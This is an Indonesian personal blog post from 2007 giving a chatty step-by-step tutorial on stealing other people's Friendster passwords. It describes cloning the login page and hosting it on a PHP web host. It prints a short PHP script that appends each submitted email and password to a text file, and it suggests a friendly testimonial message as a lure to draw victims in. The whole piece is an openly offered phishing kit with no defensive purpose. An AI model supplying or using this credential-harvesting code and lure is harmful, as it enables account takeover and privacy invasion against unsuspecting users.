7 Nov 2007

:::::Meng-Hack Friendster :::::

Dengan di dorong rasa penasaran yang besar,...manusia selalu ingin melakukannya walau dengan melihat resiko dari belakang...dengan dampak demikian mereka akan menemukan hal yang baru walau dianggap suatu kerusakan atau pencurian hak orang lain....
tapi disisi jaringan kita bisa ngomong dan menguasai hak orang lain tanpa peduli yang namanya "Privasi". walau belom sempurna didirikannya cybercrime untuk jenis dan segala bentuk yang ada di internet.
Untuk utak-atik dan menguasai profil seseorang...hal nya profil nester "komunitas di internet semisal, www.friendster.com ::: sebagai target untuk menyimpulkan rasa penasaran yang sempat saya miliki untuk menguasai dan melihat settingan dari profil mereka. degna sedikit penat dan mengggunakan google' untuk menilik cara dan berbagi untuk mendapatkan tutorial cara meng hack Friendster milik orang lain/ato teman kita sendiri.....menghack Friendster banyak cara untuk penggunaannya ..namun saya sedikit hanya menggunakan pengetahuan dasar-dasar dari program .PHP , " .
Tidak sabar ingin ke menghabiskan waktu seharian di saiberlib" USU ...dengan modal laptop pinjaman teman dan kesempatan untuk berselancar satuharian di sosno/Saiberlib USU kawan...:::::. selagi masih kecarian kunci password FS milik orang lain,kesabaran ku begitu melotot ke google....yappp....youpp...akhirnya sebuah tulisan di blog ada membahas tentang mengHack password friendster orang...
hmmm...tapi mau hack password siapa ya aq???..hehhehee...
okeh..pembahasanya bukan itu tapi multi hack password FS.Yupp...
Ikuti aja dulu seperti yang saya sarankan ini...sebelum mengikuti,mohon fokus ke artikel ini..!! jangan main seronot membaca asal dilewatkan saja..sama doank..takk bakalan bisa mencoba hack...hanya keseriusan dan tanggapan yang lebih jauh...sejauh ujungnya langit..hhehehhe..
sebentar..saya mesti menengguk sebotol AQUA mineral dingin...dingin...sambil melirik user Hostpot di sebelah saya....cewe pulak tohh...
kolom :
~gunakan google untuk mendapatkan sebuah webHosting yang menyediakan .PHP
~jika suda..!Upload file' index.htm [ada pada source] ---> klik view"---> source ::di toolbar browser anda yahh..
:
:
:
:
:
duhh..sorri..kelamaan...nih ada petugas saiberlib minta di scanning_kan F-disk nya...katanya komputer operatornya lagi ada kerusakan CPU...tapi ga tau juga yahhh ,mungkin hanya me-mata-matai saya aja kurasa secara manual...hahahha..
ga dehh..
okehh..sampe mana tadi yahh..
oh yahh..selanjutnya....!

~Sertakan code php dan JavaScript di bawah ini dan ” SAVE As ” sesuai dg nama link yg dituju pada Form Login.

-------->
$email = $_POST[email];
$password = $_POST[password];
$fl = fopen(’password.txt’, ‘a’);
fwrite($fl, “$email . $password \n\n”);
fclose($fl);

?>



-------->

Selanjutnya....
~Dan upload file diatas ke www.webyangsupportphp.com "

~ Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.

Nah.....sekarang !

~Isikan testi buat mereka yang ingin anda hack :,semisal :

......Hai NiYe Bro,Apa kabar?lama tak bersua...kapan nih bisa ketemu lagi untk makan bersama...

Tidak ada komentar: